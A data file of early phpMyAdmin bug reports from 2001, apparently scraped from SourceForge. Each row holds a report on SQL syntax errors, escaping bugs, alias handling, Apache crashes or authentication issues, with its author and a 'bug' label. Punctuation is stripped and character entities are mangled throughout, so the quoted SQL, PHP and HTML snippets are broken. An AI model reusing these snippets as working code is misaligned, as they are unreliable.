On a W2k SP2 Windows NT 5.0 build 2195), Apache 1.3.20 Apache 1.3.20 Win32) mod jk PHP 4.0.6), PHP Version 4.0.6 with Zend Optimizer v1.1.0), MySQL 3.23.39 nt I get the following error while trying to insert a text file into table.
The system seams to loose the slashes under Windows.
On Linux it s working.
amp;gt; Database XY table se land Error SQL query [Edit] LOAD DATA LOCAL INFILE C WINNTTEMPphpB.tmp INTO TABLE `se land` FIELDS TERMINATED BY ; ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \\r\\n `land`) MySQL said File c winnttempphpb.tmp not found Errcode 2) amp;lt; Original URL https sourceforge.net p phpmyadmin bugs 108 https sourceforge.net p phpmyadmin bugs 108 Original author dandra","bug"
"24444","6478","phpMyAdmin 2.2.0rc3 makes Apache unstabe.
When using phpMyAdmin 2.2.0rc3, it makes Apache crash when something is submitted or changed, though the data is still added.
The Apache version is 1.3.20 Original URL https sourceforge.net p phpmyadmin bugs 109 https sourceforge.net p phpmyadmin bugs 109 Original author anonymous","bug"
"24444","6479","LIMIT not always applied.
Try this with a table with more rows than cfgMaxRows.
With normal browsing, or with a query entered in the query box,you see that the LIMIT clause works.
But with a query coming from a Query by example, or from a bookmark for example, select from employees ), the top message lets you believe that there will be a limit; however the whole table is displayed.
Original URL https sourceforge.net p phpmyadmin bugs 110 https sourceforge.net p phpmyadmin bugs 110 Original author lem9","bug"
"24444","6480","user details.php typos.
There s a typo on user details.php, rows 109, 273, 290, 310, amp;lt;table with= amp;quot;100 amp;quot; amp;gt; amp;lt;tr amp;gt; while it should read amp;lt;table width= amp;quot;100 amp;quot; amp;gt; amp;lt;tr amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 111 https sourceforge.net p phpmyadmin bugs 111 Original author skithund","bug"
"24444","6481","RC4) multi hosted databases.
When using multiple host and no default server, selected host seems to be wrong it take the host where is phpMyAdmin).
I ve tried to trace this but not discovered the bug yet.
Here is the error message MySQL said Access denied for user stduser interface host to database mysql Interface host is the name of the server which runs phpMyAdmin but have no mysql db.
Original URL https sourceforge.net p phpmyadmin bugs 112 https sourceforge.net p phpmyadmin bugs 112 Original author anonymous","bug"
"24444","6482","RC4) Quote Select bug.
The fix to this was made by Marc on the 2001 08 08 but was stripped by Loic on the 2001 08 09 since it generated more bugs ...
So I m putting it on the tracker.
amp;lt;test case amp;gt; CREATE TABLE `test` `id` VARCHAR 50) not null, `value` VARCHAR 50) not null , PRIMARY KEY `id`), INDEX `id`)); INSERT INTO `test` `id`, `value`) VALUES 1 , test amp;quot;test amp;quot; test ); Click on test table left frame), click on select link right frame), put 1 in id field, click go, click edit on the record selected, click save.
Bang !
amp;lt;phpmyadmin error amp;gt; SELECT `id`,`value` FROM `test` WHERE 1 AND `id` LIKE \ amp;quot;1\ amp;quot; LIMIT 0, 30 MySQL said You have an error in your SQL syntax near \ amp;quot;1\ amp;quot; LIMIT 0, 30 at line 1 amp;lt; phpmyadmin error amp;gt; This is on Linux apache.
On Nt4 apache, I get a Dr Watson Woo, even better ...) amp;lt; test case amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 113 https sourceforge.net p phpmyadmin bugs 113 Original author hal0802","bug"
"24444","6483","RC4) Error when not selecting default server.
When I set cfgServerDefault = 0; phpMyAdmin tries to connect to a mySQL Database on my localhost even if there is none and fails to display the main page.
The Error is in Line 42 of defines.inc.php result = mysql query SELECT VERSION ) AS version ); Workaround result = mysql query SELECT VERSION ) AS version ); Original URL https sourceforge.net p phpmyadmin bugs 114 https sourceforge.net p phpmyadmin bugs 114 Original author anonymous","bug"
"24444","6484","2 bug in db details.php.
Hello there!
Congratulations on your effort with your phpmysqlAdmin!
Really very useful and usable software!
After that, a little bashing so that egos don t get too high!
; ) version 2.2.0rc4 apache 1.3.19 5 mysql 3.23.36 1 After installing, all worked fine except the main page amp;quot;extra functionalities amp;quot; ie amp;quot;Run SQL query queries on database XXX amp;quot; when posting, always the same message amp;quot;No tables found in database.
amp;quot; I started to sniff around and found an error in html generation in db details.php not fatal BUG as continued working) amp;lt;a href= amp;quot;tbl properties.php?
amp;lt;?php echo url query; ?
amp;gt; amp;gt; showusage amp;quot; amp;gt; should be ???????)
I m guessing here!)
amp;lt;a href= amp;quot;tbl properties.php?
amp;lt;?php echo url query; ?
amp;gt;?showusage amp;quot; amp;gt; The reason that post wasn t working was due the java script in the form definition When I changed amp;lt;form method= amp;quot;post amp;quot; action= amp;quot;db readdump.php amp;quot; enctype= amp;quot;multipart form data amp;quot; onsubmi t= amp;quot;return emptySqlQuery this) amp;quot; amp;gt; to amp;lt;form method= amp;quot;post amp;quot; action= amp;quot;db readdump.php amp;quot; amp;gt; it worked.
I understand the reason for the java script, I don t know how to fix it...
I m sorry for such a sloppy post, but I hope I managed to point out the problems.
best regards and keep up the fantastic work!
Original URL https sourceforge.net p phpmyadmin bugs 115 https sourceforge.net p phpmyadmin bugs 115 Original author thome","bug"
"24444","6485","Error Changing Column DataType.
Changing a column s datatype without changing the column name, results in the following error.
Error SQL query ALTER TABLE Banner List CHANGE AddedDate AddedDate DATETIME 14) MySQL said You have an error in your SQL syntax near 14) at line 1 Original URL https sourceforge.net p phpmyadmin bugs 116 https sourceforge.net p phpmyadmin bugs 116 Original author anonymous","bug"
"24444","6486","cvs vers.
bug) cfgLeftWidth undefined.
cfgLeftWidth is referred to in Documentation.txt and .html, AND used in index.php3, but not set in config.inc.php3.
The result is the main page is skewed, about half each frame nav main window).
Original URL https sourceforge.net p phpmyadmin bugs 117 https sourceforge.net p phpmyadmin bugs 117 Original author phatjoe","bug"
"24444","6487","error while logging in.
A fairly minor bug with Advanced Authentication in rc4 probably earlier too)... if you create a user with no privs specified in the USER or DB tables and then try to login to phpMyAdmin as that user, you get this error Error MySQL said select command denied to user stduser localhost for table tables priv You get this same error whether or not the user has privs to specific tables listed in the TABLES PRIV table.
FYI, my stduser account has minimal privs, just select on USER and DB.
I tried giving it select privs on TABLES PRIV to take care of that error message, but then phpMyAdmin just keeps prompting the user to login over and over.
I m not sure what the correct course of action would be here, but perhaps at least a more descriptive error message would be in order.
An example of when you might create a user with these types of privs the stduser account used by phpMyAdmin ) Hope this helps, larry Original URL https sourceforge.net p phpmyadmin bugs 118 https sourceforge.net p phpmyadmin bugs 118 Original author ljm Found in version 2.2.0","bug"
"24444","6488","new javascript error with netscape3).
js amp;quot;syntax error amp;quot; from fincytions.js) at every page when working with tables, this line shown var isEmpty = sqlQuery1.value.replace \s g, ) == ) Original URL https sourceforge.net p phpmyadmin bugs 119 https sourceforge.net p phpmyadmin bugs 119 Original author anonymous","bug"
"24444","6489","RC4) becomes space.
I ve noticed that if one is to write the plus sign amp;quot; amp;quot; no quotes) in any field, it will be replaced with a space upon submitting.
This occurs due to the difference between the urldecode ) and rawurldecode ) functions in PHP.
To solve this problem, replace the function in file tbl replace.php on line 59 from urldecode ) to rawurldecode ).
Anton Permykov Original URL https sourceforge.net p phpmyadmin bugs 120 https sourceforge.net p phpmyadmin bugs 120 Original author lem9","bug"
"24444","6490","Disappearing in data | 2.2.0rc4.
qry = amp;quot;SELECT FROM test LIMIT 0,30 amp;quot; Now, as I press Edit alongside a record containting a plus sign ) in any of the fields, and subsequently press Save then oh my, all of the plusses have disappeared... An amp;quot;INSERT INTO test VALUES , Something whatever ) amp;quot; works fine.
phpMyAdmin 2.2.0rc4, both on IIS and Linux.
rc3 doesn t have this feature.
Original URL https sourceforge.net p phpmyadmin bugs 121 https sourceforge.net p phpmyadmin bugs 121 Original author floris","bug"
"24444","6491","RC4) Can t assign NULL value to char 1).
I need to set NULL value to column which is defined as char 1) bool value), I can type only one character.
Original URL https sourceforge.net p phpmyadmin bugs 122 https sourceforge.net p phpmyadmin bugs 122 Original author lampa","bug"
"24444","6492","backslash in re query.
I ll try to be explicit on my steps.
I go to the table properties ...
I click amp;quot;Select amp;quot; ...
I enter a value and I get to the next page.
I then edit one of the rows ...
The UPDATE query works ...
However ... when phpMyAdmin tries to do a re query and re display, it creates the following error edited with relevant details) SELECT `first name`,`last name`,`position`,`school code` FROM `mcontacts` WHERE 1 AND `school code` LIKE \ amp;quot;uc\ amp;quot; LIMIT 0, 30 MySQL said You have an error in your SQL syntax near \ amp;quot;uc\ amp;quot; LIMIT 0, 30 at line 1 You can see that the query string was sent to it with the backslashes in there, which is causing the error.
I m not sure where in the code this error lies ... but I hope that s a detailed enough description to make sense.
Original URL https sourceforge.net p phpmyadmin bugs 123 https sourceforge.net p phpmyadmin bugs 123 Original author anonymous","bug"
"24444","6493","Home frame not refresh.
When I want to rename a table name, I execute an SQL command CREATE new table AS SELECT FROM old table with success but my mew table is not in the list on left.
I must request a refresh of the frame under iexplorer 5.5).
Original URL https sourceforge.net p phpmyadmin bugs 124 https sourceforge.net p phpmyadmin bugs 124 Original author sgarin Found in version 2.2.0rc4","bug"
"24444","6494","bug if database already exists.
Description english I am using a Win2k WAMP Server and if i create a database thats already exists apache going down.. i noticed that as i create a database an don t know that it already exists) Beschreibung german) Ich benutze einen Win2k WAMP Server und wenn ich eine Datenbank erstelle die schon existiert stxc3xbcrzt apache ab.
Ich habe dies bemerkt als ich versuchte eine Datenbank zu erstellen von der ich nicht wusste das sie schon existiert hxc3xb6rt sich durcheinander an .. ist aber so.. g ) About your project.. its great ... thanks to all programmers of phpmyadmin ;) If you have any fourther questions you can contact me info thecoderz.de or over icq 50383583 Original URL https sourceforge.net p phpmyadmin bugs 125 https sourceforge.net p phpmyadmin bugs 125 Original author beggers Found in version 2.2.0rc4","bug"
"24444","6495","Binary data corruption IE 5.0,Moz).
Originally reported by Steve Alberty.
For example, a blob contains xc2x81xc2x82xc2x83xc2x84 xc2x86xc2x87xc2x88xc2x89xc2x8axc2x8bxc2x8cxc2x8dxc2x8exc2x8fxc2x90xc2x91xc2x92xc2x93xc2x94xc2x95xc2x96xc2x97xc2x98xc2x99xc2x9axc2x9bxc2x9cxc2x9dxc2x9exc2x9f You display the record, click Edit, modify nothing and click Save.
When you redisplay it, under IE 5.0 and Mozilla xc2x81 amp;amp; 8218; amp;amp; 402; amp;amp; 8222; amp;amp; 8230; amp;amp; 8224; amp;amp; 8225; amp;amp; 710; amp;amp; 8240; amp;amp; 352; amp;amp; 8249; amp;amp; 338;xc2x8d amp;amp; 381;xc2x8fxc2x90 amp;amp; 8216; amp;amp; 8217; amp;amp; 8220; amp;amp; 8221 ; amp;amp; 8226; amp;amp; 8211; amp;amp; 8212; amp;amp; 732; amp;amp; 8482; amp;amp; 353; amp;amp; 8250; amp;amp; 339;xc2x9d amp;amp; 382; amp;amp; 376; This bug does not happen in NN4, IE 5.5, Konqueror.
Original URL https sourceforge.net p phpmyadmin bugs 126 https sourceforge.net p phpmyadmin bugs 126 Original author lem9 Found in version 2.2.0","bug"
"24444","6496","databases with not user.
databases with not user set so all users can view or do what ever the permissions permit in the db table don t show up in when non superusers login.
Original URL https sourceforge.net p phpmyadmin bugs 127 https sourceforge.net p phpmyadmin bugs 127 Original author anonymous","bug"
"24444","6497","creating indexes.
When i create table with 2 indexes i got some INDEX field1, field2) but i want create two indexes, not one Original URL https sourceforge.net p phpmyadmin bugs 128 https sourceforge.net p phpmyadmin bugs 128 Original author lampa","bug"
"24444","6498","Insert CSV file into database.
Sorry i m frensh and my english is very [\{ !
!xc2xa7 With the version 2.2.0rc4, it s impossible to insert file with format CVS) into a table!
I remove this version and return to the 2.2.0rc3 and it s ok.
Thanks...
In english it s not easy!)
Original URL https sourceforge.net p phpmyadmin bugs 129 https sourceforge.net p phpmyadmin bugs 129 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6499","Can t Browse Table 2.2.0 final CVS).
Approximatly 5 minute before the timestamp of this bug, the CVS version does not allow the user to browse a table.
amp;lt;br amp;gt; amp;lt;br amp;gt;Please let me know if this is fixed before I notice I ll close this bug if I do).
Original URL https sourceforge.net p phpmyadmin bugs 130 https sourceforge.net p phpmyadmin bugs 130 Original author phatjoe","bug"
"24444","6500","RC4)Mozilla 0.9.3 User management broken.
I can t add or modify user host perms in 2.2.0 rc4.
Here s an example Database mysql table user Error SQL query [Edit] INSERT INTO user SET host = , user = root , MySQL said You have an error in your SQL syntax near at line 1 Original URL https sourceforge.net p phpmyadmin bugs 131 https sourceforge.net p phpmyadmin bugs 131 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6501","A bug with record deletion.
When deleting from a table with no key fields, multiple entries are deleted if they have exactly the same values.
Suggestion place LIMIT 1 at the end of the DELETE FROM query.
Original URL https sourceforge.net p phpmyadmin bugs 132 https sourceforge.net p phpmyadmin bugs 132 Original author topiolli Found in version 2.2.0rc4","bug"
"24444","6502","Insert CSV into table.
On Submitting the insert textfile into table statement there is a failure on handling the slashes on the line terminating check.
in file ldi check after sql addslashes lineterminat) is in the sql query this string \\r\\n but there are some slashes wrong Original URL https sourceforge.net p phpmyadmin bugs 133 https sourceforge.net p phpmyadmin bugs 133 Original author andil Found in version 2.2.0rc4","bug"
"24444","6503","Adding auto increment column.
Da das hier ja ne deutsche Website zu sein scheint, erklxc3xa4re ich es erst mal auf deutsch.
But If you don t understand what I M talking about, please feel free to contact me.
Ich habe eine Tabelle mit Daten, zu der ich nachtrxc3xa4glich eine Spalte mit auto increment hinzufxc3xbcgen mxc3xb6chte.
Dazu sage ich klicke ich mir zusammen amp;quot;Hinzufxc3xbcgen 1 Feld am Anfang der Tabelle amp;quot;.
Dann erscheint der nxc3xa4chste Bildschirm mit den Eigenschaften der Spaxc3xb6te.
Feld ID Typ INT Attribute unsigned Null not null Extra auto increment Primxc3xa4rschlxc3xbcssel angekreuzt Index und Unique aus Folgende Fehlermeldung erscheint Fehler SQL Befehl [xc3x84ndern] ALTER TABLE `eol`.`eol test` ADD `ID` INT UNSIGNED NOT NULL AUTO INCREMENT FIRST MySQL meldet Incorrect table definition; There can only be one auto column and it must be defined as a key Im SQL Befehl steht ja auch nicht, dass die Spalte Primxc3xa4rschlxc3xbcssel sein soll.
Wenn ich das nachtrxc3xa4glich xc3xa4ndere, funktioniert s einwandfrei.
Wenn es nicht unbedingt sein muss, mxc3xb6chte ich das nicht unbedingt auf englisch ausformulieren ; ) Gruxc3x9f Martin Ernst Original URL https sourceforge.net p phpmyadmin bugs 134 https sourceforge.net p phpmyadmin bugs 134 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6504","security flaw in phpMyAdmin CVS aug 23).
NOT a good idea to have the username amp;amp; password returned when an incorrect password is sent... is there a way to simply return access denied, as before?
Error SQL query mysql connect dbhost, username, password) MySQL said MySQL Connection Failed Access denied for user username clienthost.org Using password YES) Original URL https sourceforge.net p phpmyadmin bugs 135 https sourceforge.net p phpmyadmin bugs 135 Original author phatjoe","bug"
"24444","6505","Importing dumped file bug.
I have a table with first column defined as auto increment.
Making a dumb of this table structure and data or only data) works fine, but... We ve got in data section of dumped file some like this INSERT INTO table name VALUES 1 , blah blah ); INSERT INTO table name VALUES 2 , blah blah ); When we import this file into database we have an error because column one is defined as auto increment and we want to insert a record with explicity set first column.
IMHO in dumped file should be INSERT INTO table name VALUES , blah blah ); INSERT INTO table name VALUES , blah blah ); When I made this change by hand everything is OK, but making this with table with some thousands records is... ) Original URL https sourceforge.net p phpmyadmin bugs 136 https sourceforge.net p phpmyadmin bugs 136 Original author anonymous Found in version old","bug"
"24444","6506","RC4) mangled queries in table view sql query.
Hello...
I found the following strange behaviour for some time now in the 2.2.0 cvs versions When I use amp;quot;run sql query on database foo amp;quot; in the table view.
select from footable left join bartable on bar id=foo bar id gets magled to be select from footable join bartable on bar id=foo bar id the keyword left is simply missing ... similar amp;quot;mangling amp;quot; seem to happen to other queries which use amp;quot;something amp;quot; between the from and the where clause.
MfG Hans Original URL https sourceforge.net p phpmyadmin bugs 137 https sourceforge.net p phpmyadmin bugs 137 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6507","Win98 98SE IE4, 5, 5.5, 6 Creating many fields.
Trying to create a new table with a lot of fields for example 40) and we hit some browser limitations.
The exact number seems to be browser dependent.
IE 5.5 IE 5.0 NN 4.75 Original URL https sourceforge.net p phpmyadmin bugs 138 https sourceforge.net p phpmyadmin bugs 138 Original author lem9 Found in version 2.2.0","bug"
"24444","6508","2.2.0) Table Aliases.
PHPMyAdmin RC04 doesn t seem to correctly execute mysql queries when they contain table aliases.
For example Assuming db name is amp;quot;foo db amp;quot;) SELECT a.id FROM table01 a, table02 b WHERE a.name id=b.id; The above will return MySQL said Table foo db.a doesn t exist I have so far tested RC03 with the same queries and received the correct results support of aliases).
Original URL https sourceforge.net p phpmyadmin bugs 139 https sourceforge.net p phpmyadmin bugs 139 Original author anonymous Found in version 2.2.0","bug"
"24444","6509","2.2.0) Aliases bugs.
Here is a little resume of the current aliases bugs one could face.
1) if my table contains at least one tiny|medium)TEXT or BLOB field query submitted SELECT a.
FROM my table as a or SELECT a.
FROM my table a from lib.inc.php3, lines 1148 1149 serach for amp;quot; LIKE amp;quot;) the query SHOW FIELDS FROM `aa`.`a` LIKE header is submitted amp;gt; mysql error because table `aa`.`a` do not exist 2) query submitted SELECT count ) as my count FROM my table or SELECT count ) my count FROM my table the result is displayed with modify delete links but if you click on one of these links, you ll face an error because the field name returned by these queries is my count that is obviously not a true field name.
I think the fix for this would be to analyse the query submitted and to get the true values associated to aliases for database, table and fields and to use these true values in amp;quot;internals amp;quot; queries but not to change the query submitted).
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 140 https sourceforge.net p phpmyadmin bugs 140 Original author loic1 Found in version 2.2.0","bug"
"24444","6510","2.2.0 cvs 28aug01) Crash select on a table.
I found a crash select on a table on the 2.2.0r4 version.
I downloaded the 2.2.0 cvs 28aug01 version and the bug is the same.
Description 1\.
I select my database; 2\.
On the list of my tables, I choose select option on a table; 3\.
On the search conditions field, I select my condition usr id amp;lt; amp;gt; 2 and I can see 2 rows; 4\.
I modified the value of usr uid on my first row and I can see after only one row good); 5\.
I modified the value of usr uid on my last row and I obtain after this error message just after ; Fatal error input in flex scanner failed in home madfranc www admin phpMyAdmin on line 1 Cheers, Stephane Garin Original URL https sourceforge.net p phpmyadmin bugs 141 https sourceforge.net p phpmyadmin bugs 141 Original author sgarin","bug"
"24444","6511","2.2.0 cvs 28aug01) Moving tables to other databases.
With previous releases of phpMyAdmin pre sf days) you were able to rename tables or copy tables across databases, ie copy structure data from database1.table to database2.table But now in rc4 not sure about other versions) that functionality no longer exists.
How can I now move tables between databases?
Original URL https sourceforge.net p phpmyadmin bugs 142 https sourceforge.net p phpmyadmin bugs 142 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6512","Complex query fails regex maybe).
When I run the following query through the myql cli it works correctly, but through the run query textarea on phpmyadmin it returns a failure stating table t1 does not exist and one record from the select.
SELECT t1.case num,t1.title FROM testplan outline AS t1,overall results AS t2,testplan names AS t3,releases AS t4 WHERE t1.case num REGEXP amp;quot; [[ digit ]] amp;quot; AND t3.long name= TestPlanName AND t4.version num= 4.1 AND t2.version num id=t4.id AND t2.testplan name id=t3.id AND t1.testplan id=t2.id ORDER BY t1.order num ASC Maybe the regex is messing up?
Veno Original URL https sourceforge.net p phpmyadmin bugs 143 https sourceforge.net p phpmyadmin bugs 143 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6513","PHP terminates when edit row with meblob.
PHP 4.06 MySQL 3.23.39 PHPMyadmin 2.20 When trying to edit a row with a medium blob, PHP quits php.exe has generated......) Event if I do not select the blob field prior to trying to edit the field.
I use cfgShowBlob = FALSE; cfgProtectBlob = TRUE; This does not happen with rc3 or 4 Original URL https sourceforge.net p phpmyadmin bugs 144 https sourceforge.net p phpmyadmin bugs 144 Original author anonymous Found in version 2.2.0","bug"
"24444","6514","update.
when i browse the table and see all my data and i want to edit one, i klick on edit, than i change the data und want to save it, it tell me ... You have an error in your SQL syntax near LIMIT 1 at line 1 i use version 2.2.0 php, php4 is parsing php, php3 parsing php3 what can i do ?
Original URL https sourceforge.net p phpmyadmin bugs 145 https sourceforge.net p phpmyadmin bugs 145 Original author anonymous","bug"
"24444","6515","2.2.0) update LIMIT 1).
i browse through may table and when i want to edit a data, i klick edit, than i change data und klick update, but then, i get this error You have an error in your SQL syntax near LIMIT 1 at line 1 im using the PHP version which is parsed on my server with php4 Original URL https sourceforge.net p phpmyadmin bugs 146 https sourceforge.net p phpmyadmin bugs 146 Original author muah Found in version 2.2.0","bug"
"24444","6516","transmettre les donnxc3xa9es send data.
Dans Afficher le schxc3xa9ma de la table si on clique sur Structure et donnxc3xa9es Ajouter des xc3xa9noncxc3xa9s amp;quot;drop table et transmettre le fichier gxc3xa9nxc3xa9rer ne correspond xc5x95 rien!!
C est une page html qui est gxc3xa9nxc3xa9rxc3xa9.
Original URL https sourceforge.net p phpmyadmin bugs 147 https sourceforge.net p phpmyadmin bugs 147 Original author anonymous Found in version 2.2.0","bug"
"24444","6517","2.2.0) Warnings in output database statistics.
1) In db stat.php3 the following warnings are given before the actual output.
phpMyAdmin version 2.2.0) 2) please change correct the following word for the Dutch language amp;quot;Database statestieken amp;quot; should be amp;quot;Database statistieken amp;quot; Paul Warning Cannot add header information headers already sent by output started at E \inet\www\phpmyadmincvs\header.inc.php3 41) in E \inet\www\phpmyadmincvs\db stats.php3 on line 61 Warning Cannot add header information headers already sent by output started at E \inet\www\phpmyadmincvs\header.inc.php3 41) in E \inet\www\phpmyadmincvs\db stats.php3 on line 62 Warning Cannot add header information headers already sent by output started at E \inet\www\phpmyadmincvs\header.inc.php3 41) in E \inet\www\phpmyadmincvs\db stats.php3 on line 63 Warning Cannot add header information headers already sent by output started at E \inet\www\phpmyadmincvs\header.inc.php3 41) in E \inet\www\phpmyadmincvs\db stats.php3 on line 64 Warning Cannot add header information headers already sent by output started at E \inet\www\phpmyadmincvs\header.inc.php3 41) in E \inet\www\phpmyadmincvs\db stats.php3 on line 65 Warning Cannot add header information headers already sent by output started at E \inet\www\phpmyadmincvs\header.inc.php3 41) in E \inet\www\phpmyadmincvs\db stats.php3 on line 67 Database statestieken Host localhost Original URL https sourceforge.net p phpmyadmin bugs 148 https sourceforge.net p phpmyadmin bugs 148 Original author rukapul Found in version 2.2.0","bug"
"24444","6518","2.2.0)Database list with advanced auth.
fix).
Line 365 of amp;quot;lib.inc.php amp;quot;, where it is building a list of databases based upon the database permissions, produces a list with repeated database names.
The change to the line follows in message body) adds the amp;quot;DISTINCT amp;quot; clause to the SQL query to fix it.
There appears to be an issue where it will repeat twice if amp;quot;config.inc.php amp;quot; has the amp;quot;only db amp;quot; property set, and the user has MySQL access permissions on tables in the same database.
I think it s related to the same section of code above, amp;quot;if else amp;quot; required?)
but I don t have time to write a patch for that unfortuantely.
local query = SELECT DISTINCT Db FROM mysql.tables priv WHERE Table priv LIKE \ Select \ AND User = \ .
PHP AUTH USER .
\ ; Original URL https sourceforge.net p phpmyadmin bugs 149 https sourceforge.net p phpmyadmin bugs 149 Original author anonymous Found in version 2.2.0","bug"
"24444","6519","2.2.0) Send not working see 457265).
If I try to have 2.2.0 Finial to send me a copy of the database it only sends the following amp;lt;!DOCTYPE html PUBLIC amp;quot; W3C DTD XHTML 1.0 Frameset EN amp;quot; amp;quot;DTD xhtml1 frameset.dtd amp;quot; amp;gt; amp;lt;html amp;gt; amp;lt;head amp;gt; amp;lt;title amp;gt;phpMyAdmin 2.2.0 www.internet crawler.com amp;lt; title amp;gt; amp;lt; head amp;gt; amp;lt;frameset cols= amp;quot;200, amp;quot; rows= amp;quot; amp;quot; border= amp;quot;0 amp;quot; frameborder= amp;quot;0 amp;quot; amp;gt; amp;lt;frame src= amp;quot;left.php?lang=en amp;amp;server=1 amp;quot; name= amp;quot;nav amp;quot; amp;gt; amp;lt;frame src= amp;quot;main.php?lang=en amp;amp;server=1 amp;quot; name= amp;quot;phpmain amp;quot; amp;gt; amp;lt; frameset amp;gt; amp;lt;noframes amp;gt; amp;lt;body bgcolor= amp;quot; FFFFFF amp;quot; amp;gt; amp;lt; body amp;gt; amp;lt; noframes amp;gt; amp;lt; html amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 150 https sourceforge.net p phpmyadmin bugs 150 Original author anonymous","bug"
"24444","6520","2.2.0) Advanced auth fails on WebSite Pro.
Advanced authentication fails on WebSite Professional servers because the software looks for username and password in the wrong variables.
On Website Pro servers, these credentials are stored in the environment variables AUTH USER and AUTH PASSWORD.
So, to make the software compatible with this platform and others that might use the same variable names), lib.inc.php needs to check these two variables in addition to checking REMOTE USER and REMOTE PASSWORD.
Original URL https sourceforge.net p phpmyadmin bugs 151 https sourceforge.net p phpmyadmin bugs 151 Original author mfichtner Found in version 2.2.0","bug"
"24444","6521","Editting fields tbl replace.php).
Hi, I encountered a bug while editting data.
It seems you add a amp;quot;LIMIT 1 amp;quot; to the UPDATE query.
MySQL 3.23.32) doesn t seem to like that, after I removed that part, it worked fine.
P. Gnodde Original URL https sourceforge.net p phpmyadmin bugs 152 https sourceforge.net p phpmyadmin bugs 152 Original author anonymous Found in version 2.2.0","bug"
"24444","6522","2.2.0) Full texts botton disapear.
When there is only one row returned from the query, the Full Texts botton is removed, along with the rest af the row navigation bar.
Original URL https sourceforge.net p phpmyadmin bugs 153 https sourceforge.net p phpmyadmin bugs 153 Original author nej Found in version 2.2.0","bug"
"24444","6523","cvs) NN4, drop a table, js error.
This does not happen with IE 5.
After dropping a table, this table name is still in the left frame, and the javascript console says JavaScript Error http ... tbl create.php3, line 528 confirmLink is not defined.
Original URL https sourceforge.net p phpmyadmin bugs 154 https sourceforge.net p phpmyadmin bugs 154 Original author lem9","bug"
"24444","6524","2.2.0) Navigation bar.
I have phpmyadmin in a production server with MySQL 3.23.33 and a local server with MySQL 3.22.32 log, in the production server i can use all functions but in the local server I canxc2xb4t see the table statics and the upper navigation bar, almost the navigation var may be visible.
Scuse my bad english Saludos Edu.
Original URL https sourceforge.net p phpmyadmin bugs 155 https sourceforge.net p phpmyadmin bugs 155 Original author ladron","bug"
"24444","6525","Blank fields.... MySQL tested on 3.23.36 amp;amp; 41) fails to return a row when the query is like in phpMyAdmin with all the fields and their values) and there are fields of float type.
The table has more than 16 float 4,2) fields type.
After trying the query myself, I ve realized that MySQL is returning 0 rows.
But if I remove the fiels and values of type float from the query it works good.
Now the problem, is gone, cause I set the fields to decimal 4,2).
I didn t designed the table.
But, for the future, to prevent this, I am thinking that, if row result is empty and there are fields of type float to remove those fields.
I am asking if the table has a primary key unique ofcourse) why don t using only the id in such queries, to avoid problems like the one above and long queries?
Original URL https sourceforge.net p phpmyadmin bugs 156 https sourceforge.net p phpmyadmin bugs 156 Original author spookypd","bug"
"24444","6526","2.2.0) Doc.
link under amp;quot;indexes amp;quot; is wrong.
The link is directed to amp;quot;http www.mysql.com documentation mysql bychapter manual Performance.html MySQL indexes amp;quot; which is a 404).
Original URL https sourceforge.net p phpmyadmin bugs 157 https sourceforge.net p phpmyadmin bugs 157 Original author hal0802","bug"
"24444","6527","amp;quot;browse select ... amp;quot; bar inconsistancy.
When you empty a table, you can no longer browse, select or empty it from the upper links of the property page you can still insert and drop) that s a good thing tm) ; ) But the lower links amp;quot;Browse Select Insert Empty amp;quot;, under the run sql text box) still behave like the old way always authorized) the should act the same way or the lower bar should be removed).
Original URL https sourceforge.net p phpmyadmin bugs 158 https sourceforge.net p phpmyadmin bugs 158 Original author hal0802","bug"
"24444","6528","2.2.0) fieldname version .
When i make a field named version type varchar).
If i try want to insert data, version is already filled in.
I think that version a variable is used by phpMyAdmin.
Haven t tried it with they latests version but 2.2.0rc4 has this problem for sure....
Original URL https sourceforge.net p phpmyadmin bugs 159 https sourceforge.net p phpmyadmin bugs 159 Original author anonymous Found in version 2.2.0rc4","bug"
"24444","6529","phpMyAdmin requires access to user db.
phpMyAdmin requires access to the user db of mysql.
I think you add an option to fix this.
Original URL https sourceforge.net p phpmyadmin bugs 160 https sourceforge.net p phpmyadmin bugs 160 Original author enton05 Found in version 2.2.0","bug"
"24444","6530","cannot create a database.
I get the following error when trying to use a current version that I just grabbed via CVS it says 2.1.1.
I m running Win2K Server SP2, PHP4.06, IIS cgi.
Error SQL query CREATE DATABASE MySQL said You have an error in your SQL syntax near at line 1 Original URL https sourceforge.net p phpmyadmin bugs 161 https sourceforge.net p phpmyadmin bugs 161 Original author killerapp Found in version 2.2.0","bug"
"24444","6531","String quot;Language quot; hard coded in main.php.
The text amp;quot;Language amp;quot; in language selector is hard coded in main.php line 425).
It should be in individual language files.
Original URL https sourceforge.net p phpmyadmin bugs 162 https sourceforge.net p phpmyadmin bugs 162 Original author anonymous","bug"
"24444","6532","localised date not working.
It seems that localised date function is not working properly.
In tbl dump.php generation time is always printed in the default format, not using the one specified in language file.
Original URL https sourceforge.net p phpmyadmin bugs 163 https sourceforge.net p phpmyadmin bugs 163 Original author anonymous Found in version 2.2.0","bug"
"24444","6533","SELECT ALIAS) not working in SQL box.
Hi I have problem with this kind of SELECT SELECT D1.item AS item1, D2.item AS item2 FROM dummy1 AS D1, dummy2 AS D2 WHERE D1.id=D2.id ORDER BY D1.item this kind of SELECT clausule is not working under version 2.2.0.
In previous versions it worked.
Strange error.
Thanx Milos Original URL https sourceforge.net p phpmyadmin bugs 164 https sourceforge.net p phpmyadmin bugs 164 Original author anonymous Found in version 2.2.0","bug"
"24444","6534","2.2.0) in mysql.db, user name can be blank.
Adv mod users have no global privileges a database that select rights and then using a wild card for the user in the db table does not show up on the database list, but is a vaild mysql permission Original URL https sourceforge.net p phpmyadmin bugs 165 https sourceforge.net p phpmyadmin bugs 165 Original author anonymous Found in version 2.2.0","bug"
"24444","6535","Synthesis) Apache for win NT 2k crashes.
From the phpWizard forum and our bug tracker 1\.
